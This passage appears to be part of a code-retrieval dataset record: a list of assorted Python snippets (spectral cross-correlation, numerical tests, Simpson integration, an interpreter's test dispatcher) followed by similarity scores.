mode=='debug':\n dbgpath = 'debug'\n if not os.path.exists(dbgpath):\n os.mkdir(dbgpath)\n plot_ccf = True\n plot_scatter = True\n figname_ccf = os.path.join(dbgpath,\n 
'lamp_ccf_{:+2d}_{:+03d}.png')\n figname_scatter = os.path.join(dbgpath,\n 'lamp_ccf_scatter.png')\n else:\n plot_ccf = False\n plot_scatter = False\n\n mean_lst = {(1, 1):[], (1, -1):[], (-1, 1):[], (-1, -1):[]}\n scatter_lst = {(1, 1):[], (1, -1):[], (-1, 1):[], (-1, -1):[]}\n all_scatter_lst = []\n all_mean_lst = []\n scatter_id_lst = []\n\n aper1_lst = spec1['aperture']\n aper2_lst = spec2['aperture']\n min_aper1 = aper1_lst.min()\n max_aper1 = aper1_lst.max()\n min_aper2 = aper2_lst.min()\n max_aper2 = aper2_lst.max()\n\n # determine the maxium absolute offsets between the orders of the two\n # spectra\n maxoff = min(max(aper1_lst.size, aper2_lst.size)//2, max_order_offset)\n aperture_offset_lst = np.arange(-maxoff, maxoff)\n\n def get_aper2(aper1, k, offset):\n if k == 1:\n # (aper2 - min_aper2) = (aper1 - min_aper1) + offset\n # in this case, real_offset = offset - min_aper1 + min_aper2\n aper2 = (aper1 - min_aper1) + offset + min_aper2\n elif k == -1:\n # (aper2 - min_aper2) = -(aper1 - max_aper1) + offset\n # in this cose, real_offset = offset + max_aper1 + min_aper2\n aper2 = -aper1 + max_aper1 + offset + min_aper2\n else:\n raise ValueError\n return aper2\n\n # aperture_k = 1: same cross-order direction;\n # -1: reverse cross-order direction.\n if aperture_k is None:\n search_aperture_k_lst = [1, -1]\n elif aperture_k in [1, -1]:\n search_aperture_k_lst = [aperture_k]\n else:\n print('Warning: Unknown aperture_k:', aperture_k)\n raise ValueError\n\n # pixel_k = 1: same main-dispersion direction;\n # -1: reverse main-dispersion direction.\n if pixel_k is None:\n search_pixel_k_lst = [1, -1]\n elif pixel_k in [1, -1]:\n search_pixel_k_lst = [pixel_k]\n else:\n print('Warning: Unknown pixel_k:', pixel_k)\n raise ValueError\n\n\n for aperture_k in search_aperture_k_lst:\n for aperture_offset in aperture_offset_lst:\n calc_pixel_shift_lst = {1: [], -1: []}\n if plot_ccf:\n fig2 = plt.figure(figsize=(10,8), dpi=150)\n axes2 = { 1: fig2.add_subplot(211),\n -1: fig2.add_subplot(212),\n }\n for row1 in spec1:\n aperture1 = row1['aperture']\n aperture2 = get_aper2(aperture1, aperture_k, aperture_offset)\n m = spec2['aperture'] == aperture2\n if m.sum()==0:\n continue\n row2 = spec2[m][0]\n flux1 = row1[colname1]\n flux2 = row2[colname2]\n for pixel_k in search_pixel_k_lst:\n '''\n if aperture_k == -1 and pixel_k == -1:\n fig1 = plt.figure(dpi=150)\n ax1 = fig1.gca()\n ax1.plot(flux1[::pixel_k], 'C0')\n ax1.plot(flux2, 'C1')\n ax1.set_title('Aper1 = %d, Aper2 = %d (%d, %d, %d)'%(\n aperture1, aperture2, aperture_k, aperture_offset,\n pixel_k))\n fig1.savefig('check_%d_%d_%d_%02d_%02d_.png'%(\n aperture_k, aperture_offset, pixel_k, aperture1,\n aperture2))\n plt.close(fig1)\n '''\n\n ccf_lst = get_simple_ccf(flux1[::pixel_k], flux2,\n pixel_shift_lst)\n # find the pixel shift\n calc_shift = pixel_shift_lst[ccf_lst.argmax()]\n # pack the pixel shift into a list\n calc_pixel_shift_lst[pixel_k].append(calc_shift)\n\n if plot_ccf:\n axes2[pixel_k].plot(pixel_shift_lst, ccf_lst, alpha=0.4)\n # pixel direction loop ends here\n # order-by-order loop ends here\n\n # adjust the ccf figure and save\n if plot_ccf:\n for ax in axes2.values():\n ax.set_xlim(pixel_shift_lst[0], pixel_shift_lst[-1])\n fig2.savefig(figname_ccf.format(aperture_k, aperture_offset))\n plt.close(fig2)\n\n # convert calc_pixel_shift_lst to numpy array\n pixel_shift_mean = {1: None, -1: None}\n pixel_shift_std = {1: None, -1: None}\n for pixel_k in search_pixel_k_lst:\n tmp = np.array(calc_pixel_shift_lst[pixel_k])\n\n mean = 
tmp.mean()\n std = tmp.std()\n\n mean_lst[(aperture_k, pixel_k)].append(mean)\n scatter_lst[(aperture_k, pixel_k)].append(std)\n\n # used to search the global minimum shift scatter along all the\n # (aperture_k, aperture_offset, pixel_k) space\n all_mean_lst.append(mean)\n all_scatter_lst.append(std)\n scatter_id_lst.append((aperture_k, aperture_offset, pixel_k))\n\n # direction loop ends here\n\n # plot the scatters of peaks and save it as a figure file\n if plot_scatter:\n fig3 = plt.figure(dpi=150, figsize=(8,6))\n ax3 = fig3.gca()\n for key, scatters in scatter_lst.items():\n aperture_k, pixel_k = key\n if len(scatters)==0:\n continue\n ax3.plot(aperture_offset_lst, scatters,\n color = {1:'C0', -1:'C1'}[aperture_k],\n ls = {1:'-', -1:'--'}[pixel_k],\n label = 'Aperture k = {}, Pixel k = {}'.format(\n aperture_k, pixel_k))\n ax3.set_xlabel('Aperture Offset')\n ax3.set_ylabel('Scatter (pixel)')\n ax3.legend(loc='lower right')\n fig3.savefig(figname_scatter)\n plt.close(fig3)\n\n imin = np.argmin(all_scatter_lst)\n scatter_id = scatter_id_lst[imin]\n result_aperture_k = scatter_id[0]\n result_aperture_offset = scatter_id[1]\n result_pixel_k = scatter_id[2]\n result_pixel_offset = all_mean_lst[imin]\n\n # convert aperture_offset to real aperture_offset\n real_aperture_offset = {\n 1: result_aperture_offset - min_aper1 + min_aper2,\n -1: result_aperture_offset + max_aper1 + min_aper2,\n }[result_aperture_k]\n return (result_aperture_k, real_aperture_offset,\n result_pixel_k, result_pixel_offset)", "def indmatch(ra1, dec1, ra2, dec2, tol):\n m = match(ra1, dec1, ra2, dec2, tol)\n c = m.ind > -1\n i1 = c.nonzero()[0]\n i2 = m.ind[c]\n return i1, i2", "def test_OR():\n\tk, outputs = 2, [0,1,1,1]\n\t# Prime Implicants\n\ttrue_pi0s = set(['00'])\n\ttrue_pi1s = set(['12','21'])\n\n\ttdt0, tdt1 = make_transition_density_tables(k=k, outputs=outputs)\n\tpi0s, pi1s = find_implicants_qm(tdt0) , find_implicants_qm(tdt1)\n\n\tassert (pi0s == true_pi0s) , ('Prime Implicants for 0 does not match. %s != %s' % (pi0s,true_pi0s))\n\tassert (pi1s == true_pi1s) , ('Prime Implicants for 1 does not match. %s != %s' % (pi1s,true_pi1s))\n\t# Two Symbols\n\ttrue_ts0s = [('00',[],[[0,1]])]\n\ttrue_ts1s = [('12',[[0,1]],[])]\n\n\tts0s,ts1s = find_two_symbols_v2(k=k, prime_implicants=pi0s) , find_two_symbols_v2(k=k, prime_implicants=pi1s)\n\n\tassert (ts0s == true_ts0s) , ('Two Symbol for 0 does not match. %s != %s' % (ts0s,true_ts0s))\n\tassert (ts1s == true_ts1s) , ('Two Symbol for 1 does not match. 
%s != %s' % (ts1s,true_ts1s))", "def __symbols_are_close_in_equation(symbol_1_indices, symbol_2_indices):\n\n for index_1 in symbol_1_indices:\n for index_2 in symbol_2_indices:\n if index_1 == index_2 + 1:\n return index_2, index_1\n elif index_2 == index_1 + 1:\n return index_1, index_2\n return -1, -1", "def expected(x, y):", "def expected(x, y):", "def expected(x, y):", "def test032_2d_numerical_comparison_on_vs_np(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def evaluate(bounds , func):\n if len(bounds) != 2:\n raise ValueError(\"Bounds should contain 2 elements, found %d.\" % len(bounds))\n\n a = bounds[0]\n b = bounds[1]\n ya = func(a)\n yb = func((a+b)/2.)\n yc = func(b)\n I = (b-a) * (ya + 4. * yb + yc) / 6.\n return I", "def calculation(numbers, indexes):\n ops = [ops_tuple[x] for x in indexes]\n repr_ops_and_nums = tuple(repr_ops_tuple[x] for x in indexes) + numbers\n try:\n if ops[0](numbers[0], ops[1](numbers[1], ops[2](numbers[2], \\\n numbers[3]))) == 24:\n return '({0} {3} ({1} {4} ({2} {5} {6})))'.format(*repr_ops_and_nums)\n if ops[0](ops[1](numbers[0], numbers[1]), \\\n ops[2](numbers[2], numbers[3])) == 24:\n return '({0} ({1} {3} {4}) ({2} {5} {6}))'.format(*repr_ops_and_nums)\n except ZeroDivisionError:\n pass # omit zero division error", "def test052_2d_numerical_comparison_on_vs_np_mp(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def resta(x, y):\n return x - y", "def main():\n argc = len(sys.argv)\n if argc > 1:\n first_arg = sys.argv[1]\n if first_arg == '--test':\n env = environment.Environment()\n execution.execute_statement('x = 3', env)\n execution.execute_statement('x+=7', env)\n execution.execute_statement('y=9.23', env)\n env.new_frame()\n execution.execute_statement('x = 5', env)\n print(env.frames)\n execution.execute_statement('z=\"hello world\"', env)\n execution.execute_statement('z +=\"!!!\"', env)\n execution.execute_statement('a= `gelatin`', env)\n print(env.frames)\n ast = ast2.AST(\"3*4+5 ^ 7\")\n print(ast.parse())\n print(ast.collapse_indices(ast.build_indices()))\n ast = ast2.AST(\"18+15*9:3+10\")\n print(ast.parse())\n print(ast.collapse_indices(ast.build_indices()))\n\n print(execution.evaluate_expression('1+2+3+4', environment.Environment()))\n print(execution.evaluate_expression('45+7*8', environment.Environment()))\n print(execution.evaluate_expression('3.2+18^2-7', environment.Environment()))\n print(execution.evaluate_expression('1:2 + 1:3 + 1:5', environment.Environment()))\n print(execution.evaluate_expression('2:3 + 3^3 - 1:5', environment.Environment()))\n 
print(execution.evaluate_expression('1234', environment.Environment()))\n \n ast = ast2.AST(\"3 + 1 == 4\")\n print(ast.parse())\n ast = ast2.AST(\"3 + 1 > 4\")\n print(ast.parse())\n ast = ast2.AST(\"18:1 != 18.2\")\n print(ast.parse())\n ast = ast2.AST(\"x = 4\")\n print(ast.parse())\n ast = ast2.AST(\"y = 3 > 4\")\n print(ast.parse())\n \n env2 = environment.Environment()\n execution.execute_statement('x = 3+5*4', env2)\n execution.execute_statement('y = x + 19 - 3*6', env2)\n print(env2.frames)\n elif first_arg == '--test2':\n ast = ast2.AST('x = \"ice cream, eggs, and milk\" + \"...alpha or beta\"')\n print(ast.parse())\n ast = ast2.AST('y = f(1 + 1, 2 + 2, 3 + 3) - g((9+7)*2, 128/(2+2))')\n print(ast.parse())\n ast = ast2.AST('z = f(\"ice cream\", \"eggs and milk\") * g(\"alpha or beta\", 3:8, \"gamma or delta\")')\n print(ast.parse())\n ast = ast2.AST('makeList(1,2,3) + makeList(4,5,6)')\n print(ast.parse())\n ast = ast2.AST('[max(16, 25), max(36, max(49, 64))]')\n print(ast.parse())\n ast = ast2.AST('[concat_lists([10], [20]), concat_lists([30], [40])]')\n print(ast.parse())\n elif first_arg == '--test3':\n ast = ast2.AST('[1, 2, 3]')\n print(ast.split_list_elems())\n ast = ast2.AST('[f(2), f(3), f(4)]')\n print(ast.split_list_elems())\n ast = ast2.AST('[f(2, 3), f(3, 4, 5), f(4, 1)]')\n print(ast.split_list_elems())\n ast = ast2.AST('1 + 2 * 3')\n print(ast.split_list_elems())\n print(ast.parse())\n elif first_arg == '--test4':\n ast = ast2.AST('x.length()')\n print(ast.parse())\n ast = ast2.AST('[1,2,3].length()')\n print(ast.parse())\n ast = ast2.AST('3.01')\n print(ast.parse())\n ast = ast2.AST('3.1')\n print(ast.parse())\n elif first_arg == '--test5':\n env = environment.Environment()\n env.new_type(['Number'], 'ComplexNumber')\n c = {'$type': 'ComplexNumber', 'real': 1, 'imag': 2}\n print(env.value_is_a(c, 'ComplexNumber'))\n print(env.value_is_a(c, 'Number'))\n print(env.value_is_a(c, 'Int'))\n print(\"\")\n env.new_type(['Object'], 'Food')\n env.new_type(['Food'], 'Pizza')\n env.new_type(['Food'], 'Dessert')\n env.new_type(['Dessert'], 'ChocolateItem')\n env.new_type(['Pizza'], 'PepperoniPizza')\n env.new_type(['Pizza', 'ChocolateItem'], 'ChocolatePizza')\n pepperoni_pizza = {'$type': 'PepperoniPizza'}\n chocolate_pizza = {'$type': 'ChocolatePizza'}\n print(env.value_is_a(pepperoni_pizza, 'PepperoniPizza'))\n print(env.value_is_a(pepperoni_pizza, 'Pizza'))\n print(env.value_is_a(pepperoni_pizza, 'Food'))\n print(env.value_is_a(pepperoni_pizza, 'Dessert'))\n print(env.value_is_a(pepperoni_pizza, 'ChocolateItem'))\n print(\"\")\n print(env.value_is_a(chocolate_pizza, 'PepperoniPizza'))\n print(env.value_is_a(chocolate_pizza, 'Pizza'))\n print(env.value_is_a(chocolate_pizza, 'Food'))\n print(env.value_is_a(chocolate_pizza, 'Dessert'))\n print(env.value_is_a(chocolate_pizza, 'ChocolateItem'))\n print(\"\")\n env.new_type(['ChocolatePizza'], 'HugeChocolatePizza')\n huge_chocolate_pizza = {'$type': 'HugeChocolatePizza'}\n print(env.value_is_a(huge_chocolate_pizza, 'PepperoniPizza'))\n print(env.value_is_a(huge_chocolate_pizza, 'Pizza'))\n print(env.value_is_a(huge_chocolate_pizza, 'Food'))\n print(env.value_is_a(huge_chocolate_pizza, 'Dessert'))\n print(env.value_is_a(huge_chocolate_pizza, 'ChocolateItem'))\n print(env.value_is_a(huge_chocolate_pizza, 'ChocolatePizza'))\n print(\"\")\n elif first_arg == '--test6':\n ast = ast2.AST('{1, 2 | 3, 4}')\n print(ast.parse())\n elif first_arg == '--test7':\n ast = ast2.AST('throw \"something\"')\n print(ast.parse())\n elif first_arg == 
'--test8':\n ast = ast2.AST('true and not false')\n print(ast.parse())\n print(ast.collapse_indices(ast.build_indices()))\n elif first_arg == '--test9':\n sample = \"\"\"\n x = 5 // comment\n // comment\n /* multi\n line\n comment\n */y = 6\n z = \"https://example.com\"\n \"\"\"\n print(prepare_program.preprocess(sample))\n elif first_arg == '--test10':\n ast = ast2.AST('-3.0e5 + 186e-20 * 1e-6 / 28.8e+6 + 34.4e+99')\n print(ast.parse())\n ast = ast2.AST('-3.0E5 + 186E-20 * 1E-6 / 28.8e+6 + 34.4E+99')\n print(ast.parse())\n elif first_arg == '--test11':\n print(execution.is_assignment_statement('a = 5'))\n print(execution.is_assignment_statement('a=5==6'))\n print(execution.is_assignment_statement('not (5==6) and (8>=7)'))\n print(execution.is_assignment_statement('z='))\n elif first_arg == '--test12':\n lines = [\n 'sub this + that',\n 'func Int x + this',\n 'func x + this',\n 'func this * y',\n 'func Int -this',\n 'sub -this',\n 'sub not this',\n 'sub Boolean not this',\n 'sub this-b',\n 'sub b-this',\n 'func Int-this',\n 'func Int- this',\n 'sub Int - this'\n ]\n print(prepare_program.replace_op_overload_syntax(lines))\n elif first_arg == '--test-tree-merge':\n tests.test_tree_merge()\n elif first_arg == '--test-all':\n tests.test_all('capacita_programs')\n elif first_arg == '--test-all-fast':\n tests.test_all('capacita_programs', has_delay=False)\n elif first_arg == '--test-repl':\n tests.test_all('capacita_programs', has_delay=True, use_repl=True)\n elif first_arg == '--test-repl-fast':\n tests.test_all('capacita_programs', has_delay=False, use_repl=True)\n elif first_arg == '--test-file' and argc > 2:\n if argc == 4 and sys.argv[2] == '--repl':\n tests.test_file(sys.argv[3], use_repl=True)\n else:\n tests.test_file(sys.argv[2], use_repl=False)\n else:\n # Run a program from a text file:\n file_name = first_arg\n execute_file(file_name)\n exit()\n repl()" ]
[ "0.54499704", "0.54236096", "0.54200417", "0.54183537", "0.53868484", "0.5386813", "0.5386671", "0.53676295", "0.53601813", "0.5349417", "0.53437924", "0.53436583", "0.5304866", "0.53009784", "0.5292884", "0.52877325", "0.5283028", "0.5282718", "0.5279577", "0.52767044", "0.5276021", "0.5260619", "0.5257482", "0.52488494", "0.52344966", "0.52331054", "0.5233018", "0.5230695", "0.52179277", "0.5217522", "0.52054197", "0.5195868", "0.5189734", "0.51829654", "0.5181476", "0.5177961", "0.517586", "0.5174988", "0.5174578", "0.51669264", "0.51631236", "0.5151324", "0.5147226", "0.51358706", "0.513306", "0.51312584", "0.5129804", "0.51283187", "0.51192945", "0.51058984", "0.5096199", "0.5088895", "0.5087355", "0.5071146", "0.5070005", "0.50689626", "0.5064859", "0.5054195", "0.505373", "0.5053145", "0.50525963", "0.50501037", "0.50262296", "0.50257456", "0.502241", "0.502136", "0.5011525", "0.5004945", "0.5003532", "0.50032806", "0.49986234", "0.4993963", "0.49928966", "0.4987319", "0.4986297", "0.49788633", "0.49728307", "0.49683145", "0.49595952", "0.49521044", "0.4937498", "0.49374878", "0.49335614", "0.49298248", "0.49178353", "0.49149936", "0.49027124", "0.4901953", "0.48967844", "0.48941246", "0.48922443", "0.48898706", "0.48898706", "0.48898706", "0.4885512", "0.48848727", "0.48802847", "0.48792848", "0.4869185", "0.48678133" ]
0.70558316
0
Test pointwise arithmetic with stencil offsets across a single function with buffering dimension in indexed expression format
def test_indexed_buffered(self, expr, result):
    i, j, l = dimify('i j l')
    a = symbol(name='a', dimensions=(i, j, l), value=2., mode='indexed').base
    fa = a.function

    eqn = eval(expr)
    Operator(eqn)(fa)
    assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_indexed_stencil(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=0., mode='indexed').base\n fa = a.function\n b = symbol(name='b', dimensions=(j, l), value=2., mode='indexed').base\n fb = b.function\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data[1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)", "def _evaluable_view(self, stencil, arr, offset=0):\n if self.dim == 1:\n if isinstance(stencil, Stencil):\n\n l = self.borders[0]-stencil.b[0][0]\n r = -(self.borders[1]-stencil.b[0][1])\n else:\n l = self.borders[0]-stencil[0][0]\n r = -(self.borders[1]-stencil[0][1])\n return arr[l+offset: r+offset]\n else:\n raise NotImplementedError(\"Another dimension than one \"\n \"is not supplied\")", "def test_indexed_open_loops(self, expr, result):\n i, j, l = dimify('i j l')\n pushed = [d.size for d in [j, l]]\n j.size = None\n l.size = None\n a = DenseData(name='a', dimensions=(i, j, l), shape=(3, 5, 6)).indexed\n fa = a.function\n fa.data[0, :, :] = 2.\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)\n j.size, l.size = pushed", "def test_elemwise_multiple_inputs_optimisation(self):\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n# (fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx+dy+dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx*dy*dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (dx*dy*(dx+dy+dz),(dx,dy,dz),(dxv,dyv,dzv),2,'float64'),\r\n# (fx*fy*(fx+fy+dz),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type add\r\n# (dz*fy*(fx+fy),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (2+fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (2*fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (fx*fy*2*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (fx*fy*(2+fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n (fx * fy * 2 * (fx + fy + fz+2), (fx, fy, fz), (fxv, fyv, fzv), 2, {\r\n 'custom': 'float32', 
'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n\r\n #check with broadcast of row\r\n# (fx+fy+fz+fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fz*fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv+fx+fy+fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv*fx*fy*fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fv*(fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*fv*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (dx+dy+dz+dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dz*dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv+dx+dy+dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv*dx*dy*dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dv*(dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*dv*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_elemwise1():\r\n\r\n shape = (3, 4)\r\n a = tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32') + 0.5, 'a')\r\n b = tensor.fmatrix()\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, b ** a)], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, tensor.exp(b ** a))], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, a + b * tensor.exp(b ** a))],\r\n mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)", "def bitwise_stats(traces, N, delta):\n \n X = np.zeros((N,),dtype=int)\n padded_traces = pad_traces(traces, N)\n num_traces = padded_traces.shape[0]\n \n p = np.zeros(N)\n for j in range(N):\n p[j] = np.sum(padded_traces[:,j])/num_traces\n \n c = np.concatenate((np.ones(N,), np.zeros(N,)), axis=None)\n bounds = (0,1)\n \n for i in range(N):\n A_ub = np.zeros((2*N,2*N))\n for j in range(N):\n for k in range(N):\n if j == k:\n A_ub[j,k] = -1\n A_ub[j+N,k] = -1\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n elif k > j:\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n \n b_ub = np.concatenate((p,-1*p), axis=None)\n \n A_eq0 = np.zeros((i+1,2*N))\n b_eq0 = np.zeros(i+1)\n for j in range(i+1):\n A_eq0[j,j+N] = 1\n if j==i:\n b_eq0[j] = 0\n else:\n b_eq0[j] = X[j]\n \n A_eq1 = np.zeros((i+1,2*N))\n b_eq1 = np.zeros(i+1)\n for j 
in range(i+1):\n A_eq1[j,j+N] = 1\n if j==i:\n b_eq1[j] = 1\n else:\n b_eq1[j] = X[j]\n \n res0 = linprog(c,A_ub,b_ub,A_eq0,b_eq0,bounds,method='interior-point')\n res1 = linprog(c,A_ub,b_ub,A_eq1,b_eq1,bounds,method='interior-point')\n if res0.fun < res1.fun:\n X[i] = 0\n else:\n X[i] = 1\n \n return X", "def test_var_idx_in_args(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"float array vars =\\n\\t0.5, 1\\n\\nMZgate(vars[0], vars[1]) | [0, 1]\"\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0.5, 1.0], 'kwargs': {}, 'modes': [0, 1]}\n ]", "def local_func(f, t, x, w):\n x_func = np.zeros_like(t, dtype='f')\n for i, jd in enumerate(t.jd):\n sel = (t.jd >= (jd - w)) & (t.jd <= (jd + w))\n x_func[i] = f(x[sel])\n return x_func", "def test_flat(self, expr, result, mode):\n i, j = dimify('i j')\n a = symbol(name='a', dimensions=(i, j), value=2., mode=mode)\n b = symbol(name='b', dimensions=(i, j), value=3., mode=mode)\n fa = a.base.function if mode == 'indexed' else a\n fb = b.base.function if mode == 'indexed' else b\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_elemwise_multiple_inputs_optimisation2(self):\r\n raise SkipTest(\"Current implementation of Canonizer does not \"\r\n \"implement all cases. Skip the corresponding test.\")\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx + dy + dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx * dy * dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 